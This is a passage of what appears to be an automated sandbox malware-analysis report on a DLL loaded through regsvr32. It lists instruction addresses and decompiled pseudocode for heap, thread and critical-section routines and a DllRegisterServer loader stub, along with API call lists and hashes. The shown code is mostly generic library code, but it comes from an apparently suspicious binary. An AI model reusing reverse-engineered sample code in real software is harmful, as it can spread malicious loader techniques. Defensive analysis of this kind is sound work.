                                                                                                            0x100057d5
                                                                                                            0x100057dd
                                                                                                            0x100057f5
                                                                                                            0x100057fe
                                                                                                            0x10005803
                                                                                                            0x00000000
                                                                                                            0x10005809
                                                                                                            0x10005809
                                                                                                            0x10005814
                                                                                                            0x10005827
                                                                                                            0x1000582e
                                                                                                            0x10005845
                                                                                                            0x1000584d
                                                                                                            0x1000585d
                                                                                                            0x10005894
                                                                                                            0x100058c0
                                                                                                            0x100058c7
                                                                                                            0x100058cd
                                                                                                            0x100058e6
                                                                                                            0x10005907
                                                                                                            0x10005909
                                                                                                            0x1000590c
                                                                                                            0x10005910
                                                                                                            0x10005914
                                                                                                            0x10005a04
                                                                                                            0x10005a04
                                                                                                            0x10005a0a
                                                                                                            0x10005a34
                                                                                                            0x10005a38
                                                                                                            0x10005a3e
                                                                                                            0x10005a4f
                                                                                                            0x10005a72
                                                                                                            0x10005a78
                                                                                                            0x10005a80
                                                                                                            0x10005a89
                                                                                                            0x10005a99
                                                                                                            0x10005a9b
                                                                                                            0x10005ae8
                                                                                                            0x10005aeb
                                                                                                            0x10005af0
                                                                                                            0x10005afc
                                                                                                            0x10005b03
                                                                                                            0x10005b09
                                                                                                            0x10005b23
                                                                                                            0x10005b2c
                                                                                                            0x10005b2e
                                                                                                            0x10005b33
                                                                                                            0x10005b3a
                                                                                                            0x10005b41
                                                                                                            0x10005b44
                                                                                                            0x10005b47
                                                                                                            0x10005b4a
                                                                                                            0x10005b52
                                                                                                            0x10005b7d
                                                                                                            0x10005b80
                                                                                                            0x10005b86
                                                                                                            0x10005b8b
                                                                                                            0x10005b94
                                                                                                            0x10005b9f
                                                                                                            0x10005ba7
                                                                                                            0x10005bb8
                                                                                                            0x10005bd3
                                                                                                            0x10005bd8
                                                                                                            0x10005bdd
                                                                                                            0x10006008
                                                                                                            0x10006008
                                                                                                            0x10006009
                                                                                                            0x00000000
                                                                                                            0x10005be3
                                                                                                            0x10005be3
                                                                                                            0x10005bf5
                                                                                                            0x10005c07
                                                                                                            0x10005c27
                                                                                                            0x10005c47
                                                                                                            0x10005c4f
                                                                                                            0x10005c75
                                                                                                            0x10005c79
                                                                                                            0x10005c7f
                                                                                                            0x10005c85
                                                                                                            0x10005c90
                                                                                                            0x10005c94
                                                                                                            0x10005cbf
                                                                                                            0x10005ccf
                                                                                                            0x10005cec
                                                                                                            0x10005cf2
                                                                                                            0x10005cf8
                                                                                                            0x10005d08
                                                                                                            0x10005d13
                                                                                                            0x10005d23
                                                                                                            0x10005d36
                                                                                                            0x10005d70
                                                                                                            0x10005d72
                                                                                                            0x10005d74
                                                                                                            0x10005d7a
                                                                                                            0x10005d8e
                                                                                                            0x10005da9
                                                                                                            0x10005dd5
                                                                                                            0x10005dd8
                                                                                                            0x10005dde
                                                                                                            0x10005de3
                                                                                                            0x10005dec
                                                                                                            0x10005e05
                                                                                                            0x10005e13
                                                                                                            0x10005e1e
                                                                                                            0x10005e30
                                                                                                            0x10005e4e
                                                                                                            0x10005e4f
                                                                                                            0x10005e50
                                                                                                            0x10005e55
                                                                                                            0x10005e5a
                                                                                                            0x00000000
                                                                                                            0x10005e60
                                                                                                            0x10005e60
                                                                                                            0x10005e65
                                                                                                            0x10005e6b
                                                                                                            0x10005e8c
                                                                                                            0x10005e96
                                                                                                            0x10005ea2
                                                                                                            0x10005ea4
                                                                                                            0x10005eaa
                                                                                                            0x10005eba
                                                                                                            0x10005ebd
                                                                                                            0x10005ec1
                                                                                                            0x10005f58
                                                                                                            0x10005ec7
                                                                                                            0x10005ec7
                                                                                                            0x10005ee6
                                                                                                            0x10005f04
                                                                                                            0x10005f05
                                                                                                            0x10005f10
                                                                                                            0x10005f38
                                                                                                            0x10005f39
                                                                                                            0x10005f3e
                                                                                                            0x10005f4e
                                                                                                            0x10005f53
                                                                                                            0x10005f53
                                                                                                            0x10005f5f
                                                                                                            0x10005f79
                                                                                                            0x10005f86
                                                                                                            0x10005f87
                                                                                                            0x10005f8c
                                                                                                            0x10005f91
                                                                                                            0x00000000
                                                                                                            0x10005f93
                                                                                                            0x10005f93
                                                                                                            0x10005f98
                                                                                                            0x10005f9e
                                                                                                            0x10005fa4
                                                                                                            0x10005fc1
                                                                                                            0x10005fd5
                                                                                                            0x10005fd6
                                                                                                            0x10005fdb
                                                                                                            0x10005fe0
                                                                                                            0x00000000
                                                                                                            0x10005fe2
                                                                                                            0x10005fe2
                                                                                                            0x10005ffb
                                                                                                            0x10005ffc
                                                                                                            0x10006001
                                                                                                            0x10006006
                                                                                                            0x1000601d
                                                                                                            0x10006022
                                                                                                            0x10006026
                                                                                                            0x1000610e
                                                                                                            0x1000611d
                                                                                                            0x1000602c
                                                                                                            0x10006031
                                                                                                            0x100060a5
                                                                                                            0x100060aa
                                                                                                            0x100060b0
                                                                                                            0x100060c4
                                                                                                            0x100060d4
                                                                                                            0x10006101
                                                                                                            0x1000610c
                                                                                                            0x10006033
                                                                                                            0x10006033
                                                                                                            0x10006039
                                                                                                            0x1000603f
                                                                                                            0x10006045
                                                                                                            0x1000606d
                                                                                                            0x1000608f
                                                                                                            0x10006095
                                                                                                            0x100060a4
                                                                                                            0x100060a4
                                                                                                            0x10006031
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10006006
                                                                                                            0x10005fe0
                                                                                                            0x10005f91
                                                                                                            0x10005e5a
                                                                                                            0x10005a9d
                                                                                                            0x10005aa1
                                                                                                            0x10005aa8
                                                                                                            0x10005acc
                                                                                                            0x10005ad7
                                                                                                            0x10005ae7
                                                                                                            0x10005ae7
                                                                                                            0x1000591a
                                                                                                            0x1000591a
                                                                                                            0x10005920
                                                                                                            0x1000592b
                                                                                                            0x10005936
                                                                                                            0x10005943
                                                                                                            0x10005947
                                                                                                            0x10005957
                                                                                                            0x10005981
                                                                                                            0x10005989
                                                                                                            0x1000598d
                                                                                                            0x100059a0
                                                                                                            0x100059ae
                                                                                                            0x100059cb
                                                                                                            0x100059d2
                                                                                                            0x100059e7
                                                                                                            0x100059f1
                                                                                                            0x100059f3
                                                                                                            0x100059f8
                                                                                                            0x100059fc
                                                                                                            0x00000000
                                                                                                            0x10005a02
                                                                                                            0x10005a02
                                                                                                            0x00000000
                                                                                                            0x10005a02
                                                                                                            0x100059fc
                                                                                                            0x10005914
                                                                                                            0x10005803
                                                                                                            0x10005505
                                                                                                            0x100054cb
                                                                                                            0x10005488
                                                                                                            0x10005409
                                                                                                            0x10005361

                                                                                                            APIs
                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 100056FB
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000041), ref: 10005A6B
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 10005A72
                                                                                                            • memcpy.MSVCRT ref: 10005CEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocInfoNativeProcessSystemmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1755227880-0
                                                                                                            • Opcode ID: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                                                            • Instruction ID: 53ea61cdfd61ec98e79d57da9c3d37a8995a084b4a0616e836109eb4d92bec45
                                                                                                            • Opcode Fuzzy Hash: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                                                            • Instruction Fuzzy Hash: 5A92D7326407298FD318DF6CCEC2546B7A9F789311B05863AD925DB3B5E670F909CB88
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10037446 Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10037446(signed char* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				char _v32;
				char _v40;
				char _v48;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t45;
				void* _t49;
				void* _t50;
				signed int _t71;
				signed char* _t73;
				signed int _t82;
				signed char* _t85;
				void* _t87;
				void* _t89;
				void* _t91;
				void* _t92;
				void* _t94;

				_t73 = __ecx;
				_t89 = _t94;
				_push(__ecx);
				_push(__ecx);
				_t85 = __ecx;
				_t1 = _t85 + 0x1c; // 0x1004f010
				_t42 = _t1;
				_v8 = _t42;
				EnterCriticalSection(_t42);
				_t3 = _t85 + 4; // 0x20
				_t43 =  *_t3;
				_t4 = _t85 + 8; // 0x3
				if( *_t4 >= _t43) {
					L6:
					_t82 = 1;
					if(_t43 <= 1) {
						L11:
						_t20 = _t43 + 0x20; // 0x40
						_t71 = _t20;
						_t21 = _t85 + 0x10; // 0x6f6710
						_t44 =  *_t21;
						if(_t44 != 0) {
							_t45 = GlobalHandle(_t44);
							_v12 = _t45;
							GlobalUnlock(_t45);
							_t49 = GlobalReAlloc(_v12, _t71 << 3, 0x2002);
						} else {
							_t49 = GlobalAlloc(2, _t71 << 3); // executed
						}
						if(_t49 != 0) {
							_t50 = GlobalLock(_t49);
							_t26 = _t85 + 4; // 0x20
							_v12 = _t50;
							E10011C50(_t50 +  *_t26 * 8, 0, _t71 -  *_t26 << 3);
							 *(_t85 + 4) = _t71;
							 *(_t85 + 0x10) = _v12;
							goto L19;
						} else {
							_t24 = _t85 + 0x10; // 0x6f6710
							_t87 =  *_t24;
							if(_t87 != 0) {
								GlobalLock(GlobalHandle(_t87));
							}
							LeaveCriticalSection(_v8);
							_push(_t89);
							_t91 = _t94;
							_push(_t73);
							_v32 = 0x1004d418;
							E10011C0F( &_v32, 0x10045dc0);
							asm("int3");
							_push(_t91);
							_t92 = _t94;
							_push(_t73);
							_v40 = 0x1004d4b0;
							E10011C0F( &_v40, 0x10045e04);
							asm("int3");
							_push(_t92);
							_push(_t73);
							_v48 = 0x1004d548;
							E10011C0F( &_v48, 0x10045e48);
							asm("int3");
							return _t73[0x70];
						}
					} else {
						_t17 = _t85 + 0x10; // 0x6f6710
						_t73 =  *_t17 + 8;
						while(( *_t73 & 0x00000001) != 0) {
							_t82 = _t82 + 1;
							_t73 =  &(_t73[8]);
							if(_t82 < _t43) {
								continue;
							}
							break;
						}
						if(_t82 < _t43) {
							goto L19;
						} else {
							goto L11;
						}
					}
				} else {
					_t12 = __esi + 0x10; // 0x6f6710
					__ecx =  *_t12;
					if(( *( *_t12 + __edi * 8) & 0x00000001) == 0) {
						L19:
						_t33 = _t85 + 0xc; // 0x3
						if(_t82 >=  *_t33) {
							_t34 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t85 + 0xc)) = _t34;
						}
						_t36 = _t85 + 0x10; // 0x6f6710
						 *( *_t36 + _t82 * 8) =  *( *_t36 + _t82 * 8) | 0x00000001;
						_t40 = _t82 + 1; // 0x4
						 *((intOrPtr*)(_t85 + 8)) = _t40;
						LeaveCriticalSection(_v8);
						return _t82;
					} else {
						goto L6;
					}
				}
			}

























                                                                                                            0x10037446
                                                                                                            0x10037447
                                                                                                            0x10037449
                                                                                                            0x1003744a
                                                                                                            0x1003744d
                                                                                                            0x1003744f
                                                                                                            0x1003744f
                                                                                                            0x10037454
                                                                                                            0x10037457
                                                                                                            0x1003745d
                                                                                                            0x1003745d
                                                                                                            0x10037460
                                                                                                            0x10037465
                                                                                                            0x10037474
                                                                                                            0x10037476
                                                                                                            0x10037479
                                                                                                            0x10037496
                                                                                                            0x10037496
                                                                                                            0x10037496
                                                                                                            0x10037499
                                                                                                            0x10037499
                                                                                                            0x1003749e
                                                                                                            0x100374b1
                                                                                                            0x100374b8
                                                                                                            0x100374bb
                                                                                                            0x100374cf
                                                                                                            0x100374a0
                                                                                                            0x100374a8
                                                                                                            0x100374a8
                                                                                                            0x100374d7
                                                                                                            0x100374fd
                                                                                                            0x10037503
                                                                                                            0x1003750e
                                                                                                            0x10037517
                                                                                                            0x10037522
                                                                                                            0x10037525
                                                                                                            0x00000000
                                                                                                            0x100374d9
                                                                                                            0x100374d9
                                                                                                            0x100374d9
                                                                                                            0x100374de
                                                                                                            0x100374e8
                                                                                                            0x100374e8
                                                                                                            0x100374f1
                                                                                                            0x1001ce3b
                                                                                                            0x1001ce3c
                                                                                                            0x1001ce3e
                                                                                                            0x1001ce48
                                                                                                            0x1001ce4f
                                                                                                            0x1001ce54
                                                                                                            0x1001ce55
                                                                                                            0x1001ce56
                                                                                                            0x1001ce58
                                                                                                            0x1001ce62
                                                                                                            0x1001ce69
                                                                                                            0x1001ce6e
                                                                                                            0x1001ce6f
                                                                                                            0x1001ce72
                                                                                                            0x1001ce7c
                                                                                                            0x1001ce83
                                                                                                            0x1001ce88
                                                                                                            0x1001ce8c
                                                                                                            0x1001ce8c
                                                                                                            0x1003747b
                                                                                                            0x1003747b
                                                                                                            0x1003747e
                                                                                                            0x10037481
                                                                                                            0x10037486
                                                                                                            0x10037487
                                                                                                            0x1003748c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003748c
                                                                                                            0x10037490
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10037490
                                                                                                            0x10037467
                                                                                                            0x10037467
                                                                                                            0x10037467
                                                                                                            0x1003746e
                                                                                                            0x10037528
                                                                                                            0x10037528
                                                                                                            0x1003752b
                                                                                                            0x1003752d
                                                                                                            0x10037530
                                                                                                            0x10037530
                                                                                                            0x10037533
                                                                                                            0x1003753c
                                                                                                            0x1003753f
                                                                                                            0x10037542
                                                                                                            0x10037545
                                                                                                            0x10037551
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003746e

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(1004F010,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 10037457
                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000040,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374A8
                                                                                                            • GlobalHandle.KERNEL32(006F6710), ref: 100374B1
                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374BB
                                                                                                            • GlobalReAlloc.KERNEL32 ref: 100374CF
                                                                                                            • GlobalHandle.KERNEL32(006F6710), ref: 100374E1
                                                                                                            • GlobalLock.KERNEL32 ref: 100374E8
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374F1
                                                                                                            • GlobalLock.KERNEL32 ref: 100374FD
                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10037545
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667261700-0
                                                                                                            • Opcode ID: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                                                            • Instruction ID: feedd15bf3e86fe32dc878be1727d2ab34921a7f2ef65c1774b7ebc5d14265f1
                                                                                                            • Opcode Fuzzy Hash: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                                                            • Instruction Fuzzy Hash: 8231AB71A00759AFD722CFB5CC88E5ABBF9FB44241B018929E896DB622D730F900CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10013AD4 Relevance: 7.5, APIs: 5, Instructions: 40memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10013AD4() {
				int _t2;
				void* _t8;
				void* _t14;
				void** _t15;
				void* _t21;
				void* _t23;

				if( *0x10050a64 == 3) {
					_t8 = 0;
					_t21 =  *0x10050a48 - _t8; // 0x0
					if(_t21 > 0) {
						_t14 =  *0x10050a4c; // 0x0
						_t15 = _t14 + 0xc;
						do {
							VirtualFree( *_t15, 0x100000, 0x4000);
							VirtualFree( *_t15, 0, 0x8000);
							HeapFree( *0x10050a60, 0, _t15[1]);
							_t15 =  &(_t15[5]);
							_t8 = _t8 + 1;
							_t23 = _t8 -  *0x10050a48; // 0x0
						} while (_t23 < 0);
					}
					HeapFree( *0x10050a60, 0,  *0x10050a4c);
				}
				_t2 = HeapDestroy( *0x10050a60); // executed
				return _t2;
			}









                                                                                                            0x10013adb
                                                                                                            0x10013ade
                                                                                                            0x10013ae0
                                                                                                            0x10013aed
                                                                                                            0x10013af0
                                                                                                            0x10013afd
                                                                                                            0x10013b00
                                                                                                            0x10013b0c
                                                                                                            0x10013b17
                                                                                                            0x10013b24
                                                                                                            0x10013b26
                                                                                                            0x10013b29
                                                                                                            0x10013b2a
                                                                                                            0x10013b2a
                                                                                                            0x10013b33
                                                                                                            0x10013b42
                                                                                                            0x10013b45
                                                                                                            0x10013b4c
                                                                                                            0x10013b52

                                                                                                            APIs
                                                                                                            • VirtualFree.KERNEL32(-0000000C,00100000,00004000,00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B0C
                                                                                                            • VirtualFree.KERNEL32(-0000000C,00000000,00008000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B17
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B24
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B42
                                                                                                            • HeapDestroy.KERNELBASE(100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B4C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$Heap$Virtual$Destroy
                                                                                                            • String ID:
                                                                                                            • API String ID: 782257640-0
                                                                                                            • Opcode ID: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                                                            • Instruction ID: ae232e1038543a87835a4795d6aa86e40daf30d89f668916441cffa0c1b4fc0d
                                                                                                            • Opcode Fuzzy Hash: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                                                            • Instruction Fuzzy Hash: 81F0493AA00328AFFB21DF15DCC5F0ABB75F741754F258024F6456A4B2C6B36850EB19
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10005090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 12COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 158 10005090-10005097 159 100050a0-100050ab call 10004780 158->159 160 10005099-1000509a ExitProcess 158->160 163 100050b0-100050b2 159->163
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E10005090() {
				int _t1;

				_t1 =  *0x1004d408; // 0x6beb70
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				_push("DllRegisterServer");
				_push(_t1);
				 *((intOrPtr*)(E10004780()))(); // executed
				return 0;
			}




                                                                                                            0x10005090
                                                                                                            0x10005097
                                                                                                            0x1000509a
                                                                                                            0x1000509a
                                                                                                            0x100050a0
                                                                                                            0x100050a5
                                                                                                            0x100050ae
                                                                                                            0x100050b2

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID: DllRegisterServer$pk
                                                                                                            • API String ID: 621844428-609878878
                                                                                                            • Opcode ID: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                                                            • Instruction ID: 3990abb4a36e91ec48151b626d133cf46f0332b691c0db4f0bfff747b4acf562
                                                                                                            • Opcode Fuzzy Hash: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                                                            • Instruction Fuzzy Hash: 5BC08CB1A002191BE601EBF29C8CE0B329C8B801877020414F100D2005EF30E10002A9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100350EA Relevance: 4.6, APIs: 3, Instructions: 60threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E100350EA(intOrPtr __ecx, void* __eflags) {
				void* _t37;
				intOrPtr _t54;
				void* _t56;

				E10011BF0(0x1003a421, _t56);
				_push(__ecx);
				_t54 = __ecx;
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				E10035766(__ecx, __eflags); // executed
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x1003d6fc;
				if( *((intOrPtr*)(_t56 + 8)) == 0) {
					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				} else {
					 *((intOrPtr*)(_t54 + 0x4c)) = E10011F76( *((intOrPtr*)(_t56 + 8)));
				}
				_t37 = E100373B5();
				_t44 = _t37;
				_push(0x10035062);
				_t7 = _t44 + 0x1070; // 0x1070
				 *((intOrPtr*)(E10037855(_t7) + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x28)) = GetCurrentThread();
				 *((intOrPtr*)(_t54 + 0x2c)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t37 + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x40)) = 0;
				 *((intOrPtr*)(_t54 + 0x78)) = 0;
				 *((intOrPtr*)(_t54 + 0x60)) = 0;
				 *((intOrPtr*)(_t54 + 0x64)) = 0;
				 *((intOrPtr*)(_t54 + 0x50)) = 0;
				 *((intOrPtr*)(_t54 + 0x5c)) = 0;
				 *((intOrPtr*)(_t54 + 0x84)) = 0;
				 *((intOrPtr*)(_t54 + 0x54)) = 0;
				 *((short*)(_t54 + 0x8e)) = 0;
				 *((short*)(_t54 + 0x8c)) = 0;
				 *((intOrPtr*)(_t54 + 0x44)) = 0;
				 *((intOrPtr*)(_t54 + 0x88)) = 0;
				 *((intOrPtr*)(_t54 + 0x7c)) = 0;
				 *((intOrPtr*)(_t54 + 0x80)) = 0;
				 *((intOrPtr*)(_t54 + 0x6c)) = 0;
				 *((intOrPtr*)(_t54 + 0x70)) = 0;
				 *((intOrPtr*)(_t54 + 0x90)) = 0;
				 *((intOrPtr*)(_t54 + 0x98)) = 0;
				 *((intOrPtr*)(_t54 + 0x58)) = 0;
				 *((intOrPtr*)(_t54 + 0x68)) = 0;
				 *((intOrPtr*)(_t54 + 0x94)) = 0x200;
				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
				return _t54;
			}






                                                                                                            0x100350ef
                                                                                                            0x100350f4
                                                                                                            0x100350f7
                                                                                                            0x100350fa
                                                                                                            0x100350fd
                                                                                                            0x10035107
                                                                                                            0x1003510a
                                                                                                            0x10035110
                                                                                                            0x10035120
                                                                                                            0x10035112
                                                                                                            0x1003511b
                                                                                                            0x1003511b
                                                                                                            0x10035123
                                                                                                            0x10035128
                                                                                                            0x1003512a
                                                                                                            0x1003512f
                                                                                                            0x1003513a
                                                                                                            0x10035143
                                                                                                            0x1003514f
                                                                                                            0x10035152
                                                                                                            0x10035155
                                                                                                            0x10035158
                                                                                                            0x1003515b
                                                                                                            0x1003515e
                                                                                                            0x10035161
                                                                                                            0x10035164
                                                                                                            0x10035167
                                                                                                            0x1003516d
                                                                                                            0x10035170
                                                                                                            0x10035177
                                                                                                            0x1003517e
                                                                                                            0x10035181
                                                                                                            0x10035187
                                                                                                            0x1003518a
                                                                                                            0x10035190
                                                                                                            0x10035193
                                                                                                            0x10035196
                                                                                                            0x1003519c
                                                                                                            0x100351a2
                                                                                                            0x100351a5
                                                                                                            0x100351a9
                                                                                                            0x100351b7
                                                                                                            0x100351bf

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 100350EF
                                                                                                              • Part of subcall function 10035766: __EH_prolog.LIBCMT ref: 1003576B
                                                                                                            • GetCurrentThread.KERNEL32 ref: 1003513D
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10035146
                                                                                                              • Part of subcall function 10011F76: _strlen.LIBCMT ref: 10011F80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentH_prologThread$_strlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1650857145-0
                                                                                                            • Opcode ID: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                                                            • Instruction ID: 61552a51ecdf068f7bb4f9f9d17d647312d48b00674ee0c1313581d8a4369c28
                                                                                                            • Opcode Fuzzy Hash: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                                                            • Instruction Fuzzy Hash: 44218CB0800B509FD321CF6AD44569AFBF8FFA4641F10891FE5AA8BB21CBB5A541CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001382A Relevance: 3.1, APIs: 2, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
